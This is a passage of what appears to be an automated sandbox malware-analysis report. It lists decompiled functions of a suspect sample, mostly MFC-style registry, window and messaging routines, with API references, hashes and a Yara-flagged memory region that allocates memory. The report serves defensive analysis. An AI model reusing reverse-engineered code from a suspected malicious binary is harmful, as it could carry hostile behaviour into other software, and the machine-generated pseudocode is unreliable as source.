				E004010B0( &(( *(_t42 + 0xc))[0xfffffffffffffff0]), _t38);
				return E00431B73(_t21);
			}








                  0x004200a3
                  0x004200a3
                  0x004200a3
                  0x004200aa
                  0x004200af
                  0x004200b5
                  0x004200ba
                  0x004200c5
                  0x004200c7
                  0x004200cc
                  0x004200cf
                  0x004200d4
                  0x004200d8
                  0x004200dd
                  0x004200de
                  0x004200ea
                  0x004200ee
                  0x004200f9
                  0x004200fe
                  0x004200fe
                  0x004200cf
                  0x00420114
                  0x00420122
                  0x0042012e

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004200AA
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegSetValueA.ADVAPI32(80000000,?,00000000,?,?), ref: 00420114
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Value
                  • String ID: Software\Classes\
                  • API String ID: 2677715340-1121929649
                  • Opcode ID: ab11ff7b6dd85ca76f8ef7d4a2dcb46c4aa119be024d553879f94372adda49c0
                  • Instruction ID: 36d8d2347135d1014e61bc86d482cac2e80b6f69d22420b9f2c8f0bbc59bcd91
                  • Opcode Fuzzy Hash: ab11ff7b6dd85ca76f8ef7d4a2dcb46c4aa119be024d553879f94372adda49c0
                  • Instruction Fuzzy Hash: 7301713550010CABCF01EF61C851BDE3B65EF04368F10C11AFD295A2A2DB7ADAA4CBD9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00420018, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E00420018(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t20;
				void* _t24;
				void* _t27;
				void* _t41;
				void* _t44;

				_t44 = __eflags;
				_t37 = __edx;
				_push(0);
				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
				_push( *(_t41 + 0xc));
				E00406039(__ebx, _t41 + 0xc, __edx, __edi, __esi, _t44);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				if( *(_t41 + 8) == 0x80000000) {
					_t24 = E0041EC3D();
					_t46 = _t24 - 1;
					if(_t24 == 1) {
						_push(_t41 + 0xc);
						_push("Software\\Classes\\");
						_push(_t41 + 8);
						_t27 = E004168AB(__ebx, __edi, __esi, _t46);
						 *(_t41 - 4) = 1;
						E004056C2(__ebx, _t41 + 0xc, _t27);
						E004010B0( *(_t41 + 8) + 0xfffffff0, _t37);
						 *(_t41 + 8) = 0x80000001;
					}
				}
				_t20 = RegQueryValueA( *(_t41 + 8),  *(_t41 + 0xc),  *(_t41 + 0x10),  *(_t41 + 0x14)); // executed
				E004010B0( &(( *(_t41 + 0xc))[0xfffffffffffffff0]), _t37);
				return E00431B73(_t20);
			}








                  0x00420018
                  0x00420018
                  0x00420018
                  0x0042001f
                  0x00420024
                  0x0042002a
                  0x0042002f
                  0x0042003a
                  0x0042003c
                  0x00420041
                  0x00420044
                  0x00420049
                  0x0042004d
                  0x00420052
                  0x00420053
                  0x0042005f
                  0x00420063
                  0x0042006e
                  0x00420073
                  0x00420073
                  0x00420044
                  0x00420086
                  0x00420094
                  0x004200a0

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042001F
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegQueryValueA.ADVAPI32(?,?,?,?), ref: 00420086
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$QueryValue
                  • String ID: Software\Classes\
                  • API String ID: 3057600494-1121929649
                  • Opcode ID: 606f051547e3e45d2aaf1ea27d24ff6cb1e51406f715982b84829b8d1ec6d3ef
                  • Instruction ID: 6bbe67646f65ca86f3e8ed88bc76af1affd6d011764a7e200061fff5045a4722
                  • Opcode Fuzzy Hash: 606f051547e3e45d2aaf1ea27d24ff6cb1e51406f715982b84829b8d1ec6d3ef
                  • Instruction Fuzzy Hash: 15018F31500108ABCF11EF61CC51BDE3B24EF00368F10C51AFD295A2A2DB7ACA94CB9A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041FF90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E0041FF90(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t23;
				void* _t26;
				void* _t40;
				void* _t43;

				_t43 = __eflags;
				_t36 = __edx;
				_push(0);
				E00431A9B(E0044BE6F, __ebx, __edi, __esi);
				_push( *(_t40 + 0xc));
				E00406039(__ebx, _t40 + 0xc, __edx, __edi, __esi, _t43);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				if( *(_t40 + 8) == 0x80000000) {
					_t23 = E0041EC3D();
					_t45 = _t23 - 1;
					if(_t23 == 1) {
						_push(_t40 + 0xc);
						_push("Software\\Classes\\");
						_push(_t40 + 8);
						_t26 = E004168AB(__ebx, __edi, __esi, _t45);
						 *(_t40 - 4) = 1;
						E004056C2(__ebx, _t40 + 0xc, _t26);
						E004010B0( *(_t40 + 8) + 0xfffffff0, _t36);
						 *(_t40 + 8) = 0x80000001;
					}
				}
				_t19 = RegCreateKeyA( *(_t40 + 8),  *(_t40 + 0xc),  *(_t40 + 0x10)); // executed
				E004010B0( &(( *(_t40 + 0xc))[0xfffffffffffffff0]), _t36);
				return E00431B73(_t19);
			}








                  0x0041ff90
                  0x0041ff90
                  0x0041ff90
                  0x0041ff97
                  0x0041ff9c
                  0x0041ffa2
                  0x0041ffa7
                  0x0041ffb2
                  0x0041ffb4
                  0x0041ffb9
                  0x0041ffbc
                  0x0041ffc1
                  0x0041ffc5
                  0x0041ffca
                  0x0041ffcb
                  0x0041ffd7
                  0x0041ffdb
                  0x0041ffe6
                  0x0041ffeb
                  0x0041ffeb
                  0x0041ffbc
                  0x0041fffb
                  0x00420009
                  0x00420015

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041FF97
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • RegCreateKeyA.ADVAPI32(80000000,?,00000000), ref: 0041FFFB
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Create
                  • String ID: Software\Classes\
                  • API String ID: 1257125548-1121929649
                  • Opcode ID: f64bdd3912328e0541e1767b5fd0a8945742743fea4c45dcb99d5a30ac551f09
                  • Instruction ID: ad4cc70f86dcb154f4fc015380cce98aa4d1ccfaf3cac0b944be5d41c75bc983
                  • Opcode Fuzzy Hash: f64bdd3912328e0541e1767b5fd0a8945742743fea4c45dcb99d5a30ac551f09
                  • Instruction Fuzzy Hash: F0016236400108ABCF11EF65C851BDE3B24EF10368F10C52FFD295A2A2DB79DA95CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 022F002D, Relevance: 4.9, APIs: 3, Instructions: 392memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,022F0005), ref: 022F00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,022F0005), ref: 022F0113
                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: 895abc098ca0bcaf11b762a7dbd5cd21e7295f8514ba7fbe2c37cc5ccf11011f
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: DDE1AF71A183068FDB64CF99C84072AF3E1BF84318F08453DEA959B64AE774EA45CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404F72, Relevance: 4.6, APIs: 3, Instructions: 127windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00404F72(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16, struct HWND__* _a20, char _a24) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				intOrPtr _v84;
				char _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t70;
				long _t91;
				signed int _t92;
				void* _t104;
				void* _t105;
				intOrPtr _t111;
				intOrPtr _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;

				_t109 = __ecx;
				_t120 = _a20;
				_t119 = __ecx;
				if(_t120 != 0) {
					L4:
					 *((intOrPtr*)( *_t120 + 0x150))(1);
					_v44 = _v44 & 0x00000000;
					_v48 = _a4;
					_v52 = _a8;
					_v56 = _a12;
					_t70 = _a16;
					_t111 =  *_t70;
					_t118 =  *((intOrPtr*)(_t70 + 4));
					_v60 = _t111;
					_v64 = _t118;
					_v68 =  *((intOrPtr*)(_t70 + 8)) - _t111;
					_v72 =  *((intOrPtr*)(_t70 + 0xc)) - _t118;
					_v80 = _v80 & 0x00000000;
					_v76 =  *((intOrPtr*)(_t120 + 0x20));
					_v84 =  *((intOrPtr*)(E0041F363( *((intOrPtr*)(_t70 + 8)) - _t111, _t119, _t120, _t123) + 8));
					_v88 = _a24;
					_push( &_v88);
					if( *((intOrPtr*)( *_t119 + 0x64))() != 0) {
						_v40 = _v48;
						_v36 = _v52;
						_v32 = _v84;
						_v28 = _v60;
						_v24 = _v64;
						_v20 = _v68;
						_v16 = _v72;
						_v12 = _v56 & 0xeeffffff;
						_v8 = _v88;
						E00410F0D(__eflags, _t119);
						_t91 = SendMessageA( *(_t120 + 0xe8), 0x220, 0,  &_v40); // executed
						_a20 = _t91;
						_t92 = E0040EEF5(__eflags);
						__eflags = _t92;
						if(_t92 == 0) {
							 *((intOrPtr*)( *_t119 + 0x11c))();
						}
						__eflags = _a20;
						if(_a20 == 0) {
							L6:
							return 0;
						} else {
							__eflags = _v56 & 0x10000000;
							if((_v56 & 0x10000000) != 0) {
								BringWindowToTop(_a20);
								__eflags = _v56 & 0x20000000;
								if((_v56 & 0x20000000) == 0) {
									__eflags = _v56 & 0x01000000;
									if((_v56 & 0x01000000) == 0) {
										_push(1);
									} else {
										_push(3);
									}
								} else {
									_push(2);
								}
								E00412C34(_t119);
								E004049F6(_t120, _t119);
								SendMessageA( *(_t120 + 0xe8), 0x234, 0, 0);
							}
							__eflags = 1;
							return 1;
						}
					}
					 *((intOrPtr*)( *_t119 + 0x11c))();
					goto L6;
				}
				_t104 = E00415AD9();
				_t122 = _t104;
				if(_t104 != 0) {
					L3:
					_t120 =  *((intOrPtr*)(_t104 + 0x20));
					_t123 = _t120;
					if(_t120 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				_t104 = E00406436(_t105, _t109, _t119, _t120, _t122);
				goto L3;
			}





































                  0x00404f72
                  0x00404f7c
                  0x00404f80
                  0x00404f84
                  0x00404f9b
                  0x00404fa1
                  0x00404faa
                  0x00404fae
                  0x00404fb4
                  0x00404fba
                  0x00404fbd
                  0x00404fc0
                  0x00404fc2
                  0x00404fcf
                  0x00404fd2
                  0x00404fd5
                  0x00404fd8
                  0x00404fde
                  0x00404fe2
                  0x00404fed
                  0x00404ff6
                  0x00404ffb
                  0x00405003
                  0x00405019
                  0x0040501f
                  0x00405025
                  0x0040502b
                  0x00405031
                  0x00405037
                  0x0040503d
                  0x00405048
                  0x0040504f
                  0x00405052
                  0x0040506e
                  0x00405070
                  0x00405073
                  0x00405078
                  0x0040507a
                  0x00405080
                  0x00405080
                  0x00405086
                  0x0040508a
                  0x0040500f
                  0x00000000
                  0x0040508c
                  0x0040508c
                  0x00405093
                  0x00405098
                  0x0040509e
                  0x004050a5
                  0x004050ab
                  0x004050b2
                  0x004050b8
                  0x004050b4
                  0x004050b4
                  0x004050b4
                  0x004050a7
                  0x004050a7
                  0x004050a7
                  0x004050bc
                  0x004050c4
                  0x004050d8
                  0x004050d8
                  0x004050dc
                  0x00000000
                  0x004050dc
                  0x0040508a
                  0x00405009
                  0x00000000
                  0x00405009
                  0x00404f86
                  0x00404f8b
                  0x00404f8d
                  0x00404f94
                  0x00404f94
                  0x00404f97
                  0x00404f99
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00404f99
                  0x00404f8f
                  0x00404f8f
                  0x00000000

                  APIs
                  • SendMessageA.USER32(?,00000220,00000000,?), ref: 0040506E
                  • BringWindowToTop.USER32 ref: 00405098
                  • SendMessageA.USER32(?,00000234,00000000,00000000), ref: 004050D8
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$BringException@8H_prolog3ThrowWindow
                  • String ID:
                  • API String ID: 306136782-0
                  • Opcode ID: 452149fc19147f145c348fe4a77579aa4786186d4c22d5f577727ab54a72b289
                  • Instruction ID: 6dae8c16407d9ac781d226e3f0a0722bfa2389bcaa109963fa7a45136cf591de
                  • Opcode Fuzzy Hash: 452149fc19147f145c348fe4a77579aa4786186d4c22d5f577727ab54a72b289
                  • Instruction Fuzzy Hash: 4251E474A012099FDB10DFA9C985BAEBBF5FF48304F10402AF909EB390D778A9418F95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00414B9C, Relevance: 4.6, APIs: 3, Instructions: 70registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00414B9C(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				long _t29;
				char* _t30;
				intOrPtr _t32;
				char** _t34;
				signed int _t39;
				char** _t43;
				char* _t45;

				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t34 = 0x462ba0;
				_t45 =  *0x462ba0; // 0x451b18
				if(_t45 == 0) {
					L14:
					return 1;
				}
				do {
					_t29 = RegOpenKeyExA(0x80000001,  *_t34, 0, 1,  &_v8); // executed
					if(_t29 != 0) {
						goto L12;
					}
					_t8 =  &(_t34[1]); // 0x462bc0
					_t43 =  *_t8;
					while(1) {
						_t30 =  *_t43;
						if(_t30 == 0) {
							break;
						}
						if(RegQueryValueExA(_v8, _t30, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t14 =  &(_t43[1]); // 0x1
							_t39 =  *_t14;
							_t32 = _v20;
							if(_v12 == 0) {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
							} else {
								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t43 =  &(_t43[2]);
					}
					RegCloseKey(_v8);
					_v8 = 0;
					L12:
					_t34 =  &(_t34[2]);
				} while ( *_t34 != 0);
				goto L14;
			}















                  0x00414ba8
                  0x00414bae
                  0x00414bb1
                  0x00414bb4
                  0x00414bb7
                  0x00414bbe
                  0x00414bc1
                  0x00414bc6
                  0x00414bcc
                  0x00414c5a
                  0x00414c60
                  0x00414c60
                  0x00414bd3
                  0x00414be1
                  0x00414be9
                  0x00000000
                  0x00000000
                  0x00414beb
                  0x00414beb
                  0x00414c3c
                  0x00414c3c
                  0x00414c40
                  0x00000000
                  0x00000000
                  0x00414c09
                  0x00414c11
                  0x00414c11
                  0x00414c14
                  0x00414c1a
                  0x00414c26
                  0x00414c1c
                  0x00414c1c
                  0x00414c1c
                  0x00414c1a
                  0x00414c2c
                  0x00414c2f
                  0x00414c36
                  0x00414c39
                  0x00414c39
                  0x00414c45
                  0x00414c4b
                  0x00414c4e
                  0x00414c4e
                  0x00414c51
                  0x00000000

                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000001,00462BA0,00000000,00000001,?), ref: 00414BE1
                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00414C01
                  • RegCloseKey.ADVAPI32(?), ref: 00414C45
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID:
                  • API String ID: 3677997916-0
                  • Opcode ID: dda4bb9c493b882952acdf434a85abb3409c9764fd7b0edcfaa04450280da8d2
                  • Instruction ID: 0d605141b2b3a1f8deb0ee767be3a254aedc986605f7b564ed76e2b6a05936f2
                  • Opcode Fuzzy Hash: dda4bb9c493b882952acdf434a85abb3409c9764fd7b0edcfaa04450280da8d2
                  • Instruction Fuzzy Hash: 8A2149B1D01208EFDB14CF86D944AEEFBF8FF91701F2144AAE415A6210E3B59A40CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426574, Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E00426574(void* __ecx, int _a4, CHAR* _a8, int _a12) {
				char _v8;
				int _v12;
				int _t14;
				long _t19;
				void* _t27;

				_push(__ecx);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					_t14 = GetPrivateProfileIntA(_a4, _a8, _a12,  *(__ecx + 0x68)); // executed
				} else {
					_t27 = E0042652C(__ecx, _a4);
					if(_t27 != 0) {
						_a4 = 4;
						_t19 = RegQueryValueExA(_t27, _a8, 0,  &_v12,  &_v8,  &_a4);
						RegCloseKey(_t27);
						if(_t19 != 0) {
							goto L2;
						} else {
							_t14 = _v8;
						}
					} else {
						L2:
						_t14 = _a12;
					}
				}
				return _t14;
			}








                  0x00426579
                  0x0042657a
                  0x00426580
                  0x004265d4
                  0x00426582
                  0x0042658a
                  0x0042658e
                  0x004265a7
                  0x004265af
                  0x004265b8
                  0x004265c1
                  0x00000000
                  0x004265c3
                  0x004265c3
                  0x004265c3
                  0x00426590
                  0x00426590
                  0x00426590
                  0x00426590
                  0x0042658e
                  0x004265dc

                  APIs
                  • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004265AF
                  • RegCloseKey.ADVAPI32(00000000), ref: 004265B8
                  • GetPrivateProfileIntA.KERNEL32 ref: 004265D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClosePrivateProfileQueryValue
                  • String ID:
                  • API String ID: 1423431592-0
                  • Opcode ID: 37fd7985b59ad76bee6088d2c9caf6a5d7f3d4e0e91ea3f81cef1c7659260bcd
                  • Instruction ID: 359547d3396ca64b357bdbba5d42c68a2efe29caa3992aa9148c66dea141a309
                  • Opcode Fuzzy Hash: 37fd7985b59ad76bee6088d2c9caf6a5d7f3d4e0e91ea3f81cef1c7659260bcd
                  • Instruction Fuzzy Hash: FC014676201128FBCB128F50EC04EDF3BB9FF49354F11402AF9059A154DB79EA95DBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040CC1D, Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040CC1D(struct HWND__* _a4, int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _t9;
				signed int _t11;
				long _t20;

				_t9 = GetWindowLongA(_a4, _a8);
				_t20 =  !_a12 & _t9 | _a16;
				if(_t9 != _t20) {
					SetWindowLongA(_a4, _a8, _t20); // executed
					_t11 = _a20;
					if(_t11 != 0) {
						SetWindowPos(_a4, 0, 0, 0, 0, 0, _t11 | 0x00000017);
					}
					return 1;
				}
				return 0;
			}






                  0x0040cc28
                  0x0040cc35
                  0x0040cc3a
                  0x0040cc47
                  0x0040cc4d
                  0x0040cc54
                  0x0040cc62
                  0x0040cc62
                  0x00000000
                  0x0040cc6a
                  0x00000000

                  APIs
                  • GetWindowLongA.USER32 ref: 0040CC28
                  • SetWindowLongA.USER32 ref: 0040CC47
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,?,?,0040CC87,?,000000F0,?,?,?,?,00412B88), ref: 0040CC62
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: d7c2172bb452d81a81af7510caec739e104399fd7b84e5bb0e8eb3e9bcce2491
                  • Instruction ID: 8d151290716614a4af326467620842b1de0e6c172b2ec37ab7e21d59d9d88d99
                  • Opcode Fuzzy Hash: d7c2172bb452d81a81af7510caec739e104399fd7b84e5bb0e8eb3e9bcce2491
                  • Instruction Fuzzy Hash: 93F08C75120008FFEF088F71DC998AE3B69FB18312B404539F80AC5160DB31DC61DA68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00412D87, Relevance: 4.5, APIs: 3, Instructions: 34stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00412D87(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t22;
				int _t24;
				void* _t36;
				void* _t38;

				_push(4);
				E00431A9B(E0044BD4B, __ebx, __edi, __esi);
				_t36 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					E004014C0(_t38 - 0x10, __edx);
					 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x50)))) + 0x8c))(_t38 - 0x10);
					E004048ED(__ebx,  *((intOrPtr*)(_t36 + 0x50)), __edi, _t36,  *(_t38 + 8),  *(_t38 + 0xc),  *((intOrPtr*)(_t38 - 0x10)), 0xffffffff);
					_t22 = lstrlenA( *(_t38 + 8));
					E004010B0( *((intOrPtr*)(_t38 - 0x10)) + 0xfffffff0, _t38 - 0x10);
					_t24 = _t22;
				} else {
					_t24 = GetWindowTextA( *(__ecx + 0x20),  *(_t38 + 8),  *(_t38 + 0xc)); // executed
				}
				return E00431B73(_t24);
			}







                  0x00412d87
                  0x00412d8e
                  0x00412d93
                  0x00412d99
                  0x00412daf
                  0x00412db9
                  0x00412dc1
                  0x00412dd2
                  0x00412ddd
                  0x00412deb
                  0x00412df0
                  0x00412d9b
                  0x00412da4
                  0x00412da4
                  0x00412df7

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3TextWindowlstrlen
                  • String ID:
                  • API String ID: 3549226942-0
                  • Opcode ID: b5af1ba532699d5a23646d4f2a5d320556d6468073c30116d0ca7540ada9b271
                  • Instruction ID: c23bc98a17ab587e4b111167bb2d42125b64d8fed7f86c3939704ddc0647063a
                  • Opcode Fuzzy Hash: b5af1ba532699d5a23646d4f2a5d320556d6468073c30116d0ca7540ada9b271
                  • Instruction Fuzzy Hash: 40011D35400214EFCF01AFA5CC49EAE7B71BF04328F008A69F5255A2B1DB759961DB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404CF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E00404CF2(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				signed int _t16;
				void* _t17;
				struct HWND__* _t19;
				signed int _t24;
				signed int _t27;
				void* _t38;
				signed int _t44;

				_push(__ecx);
				_push(__ecx);
				_t12 = _a8;
				_t38 = __ecx;
				_t27 = 0x56000001;
				if(_t12 != 0) {
					_v12 =  *((intOrPtr*)(_t12 + 4));
				} else {
					_v12 = 0;
				}
				_t16 =  *(_a4 + 0x20) & 0x00300000;
				_v8 = 0xff00;
				if(_t16 != 0) {
					_t24 = _t16 | 0x56000001;
					_t44 = _t24;
					_t27 = _t24;
					E00412B6C(_t38, 0x300000, 0, 0x28);
				}
				_t17 = E0041F363(_t27, 0, _t38, _t44);
				_push( &_v12);
				_push( *((intOrPtr*)(_t17 + 8)));
				_push(0xe900);
				_push( *((intOrPtr*)(_t38 + 0x20)));
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t27);
				_push(0);
				_push("mdiclient");
				_push(0x200); // executed
				_t19 = E0040492C(_t27,  &_v12, 0, _t38, _t44); // executed
				 *(_t38 + 0xe8) = _t19;
				if(_t19 != 0) {
					BringWindowToTop(_t19);
					__eflags = 1;
					return 1;
				} else {
					return 0;
				}
			}

















                  0x00404cf7
                  0x00404cf8
                  0x00404cf9
                  0x00404cff
                  0x00404d08
                  0x00404d0c
                  0x00404d16
                  0x00404d0e
                  0x00404d0e
                  0x00404d0e
                  0x00404d24
                  0x00404d26
                  0x00404d2d
                  0x00404d31
